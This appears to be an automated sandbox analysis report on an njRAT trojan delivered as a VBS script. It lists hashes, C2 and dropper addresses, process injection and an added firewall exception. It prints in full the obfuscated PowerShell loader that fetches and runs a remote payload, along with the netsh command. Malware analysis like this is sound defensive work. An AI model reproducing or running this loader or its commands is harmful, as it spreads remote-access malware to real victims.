njrat | f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2

General

Target

REQUIREMENT.vbs
Size

2KB
MD5

b17c7601e3b5dad7c15fde1ff075772b
SHA1

a81a6b3de1470de726e4e31d143bbb5799834598
SHA256

f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2
SHA512

504141a430351bc54fb02bbdf52887e0ccff1c82d8ffd967f8bd4356031c61ad920bfbee4e568a45fc43e7783f8203aeabac4292d74be5eca451cdb6edec9825

Score

10^/10

njrat hacked evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.112.210.240/bypass.txt

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

njpeople.duckdns.org:6745

Mutex

730f7d095684724798010fdf6a67928d

Attributes

reg_key
730f7d095684724798010fdf6a67928d
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

1 2712 powershell.exe
3 2712 powershell.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2712 set thread context of 2300 2712 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

2712 powershell.exe
2712 powershell.exe
2712 powershell.exe
2712 powershell.exe
2712 powershell.exe

flow	pid	process
1	2712	powershell.exe
3	2712	powershell.exe

description	pid	process	target process
PID 2712 set thread context of 2300	2712	powershell.exe	aspnet_compiler.exe

pid	process
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe
Token: 33	2300	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2300	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 2428 wrote to memory of 2712	2428	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2712	2428	WScript.exe	powershell.exe
PID 2712 wrote to memory of 1960	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 1960	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 1960	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2712 wrote to memory of 2300	2712	powershell.exe	aspnet_compiler.exe
PID 2300 wrote to memory of 1348	2300	aspnet_compiler.exe	netsh.exe
PID 2300 wrote to memory of 1348	2300	aspnet_compiler.exe	netsh.exe
PID 2300 wrote to memory of 1348	2300	aspnet_compiler.exe	netsh.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\REQUIREMENT.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13|||||||||||||||||||||||||||||||112|||||||||||||||||||||||||||||||210|||||||||||||||||||||||||||||||240/bypass|||||||||||||||||||||||||||||||txt'.Replace('|||||||||||||||||||||||||||||||','.');$LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL='2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ ^5 ^! ^7 ^8 ^a 20 3d 20 27 !e ^5 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ^5 !2 ^3 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 5^ 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 7^ 2e 57 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 27 2c 27 !c ^9 ^5 ^e 27 29 3b 0a 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 20 3d 20 27 ^^ ^f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a !1 ^^ 53 5^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 27 2e 52 !5 70 !c !1 !3 !5 28 27 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 27 2c 27 57 !e ^c !f 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 72 ^9 !e 27 29 3b 0a 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 3d 27 ^9 !0 ^5 58 28 !e !0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d !0 !3 !0 5^ 20 2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 ^2 ^8 ^e ^a 53 ^^ ^! ^7 ^8 29 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 !5 !0 57 !0 2d ^f !2 !a !0 ^5 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 ^5 ^! ^7 ^8 ^a 29 2e 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 28 2^ 53 5a 58 ^^ ^3 ^! 5! 27 29 3b 0a 2! 28 27 ^9 27 2b 27 ^5 58 27 29 28 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 2d ^a !f !9 !e 20 27 27 29 7c 2! 28 27 ^9 27 2b 27 ^5 58 27 29 3b'.Replace('^','4').Replace('!','6');Invoke-Expression (-join ($LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:1960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
4⤵
PID:1348

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1348-169-0x0000000000000000-mapping.dmp

Download
memory/2300-168-0x0000000005B90000-0x0000000005B91000-memory.dmp

Filesize
4KB

Download
memory/2300-161-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2300-162-0x000000000040747E-mapping.dmp

Download
memory/2300-173-0x00000000059D0000-0x00000000059D1000-memory.dmp

Filesize
4KB

Download
memory/2300-172-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/2300-171-0x0000000005690000-0x0000000005B8E000-memory.dmp

Filesize
5.0MB

Download
memory/2300-170-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/2300-167-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/2712-143-0x00000234CE6C8000-0x00000234CE6C9000-memory.dmp

Filesize
4KB

Download
memory/2712-132-0x00000234CE6C6000-0x00000234CE6C8000-memory.dmp

Filesize
8KB

Download
memory/2712-125-0x00000234CE6C3000-0x00000234CE6C5000-memory.dmp

Filesize
8KB

Download
memory/2712-115-0x0000000000000000-mapping.dmp

Download
memory/2712-121-0x00000234CEF60000-0x00000234CEF61000-memory.dmp

Filesize
4KB

Download
memory/2712-154-0x00000234CF0C0000-0x00000234CF0E3000-memory.dmp

Filesize
140KB

Download
memory/2712-124-0x00000234CE6C0000-0x00000234CE6C2000-memory.dmp

Filesize
8KB

Download
memory/2712-164-0x00000234CF0F0000-0x00000234CF0F1000-memory.dmp

Filesize
4KB

Download
memory/2712-126-0x00000234CF110000-0x00000234CF111000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads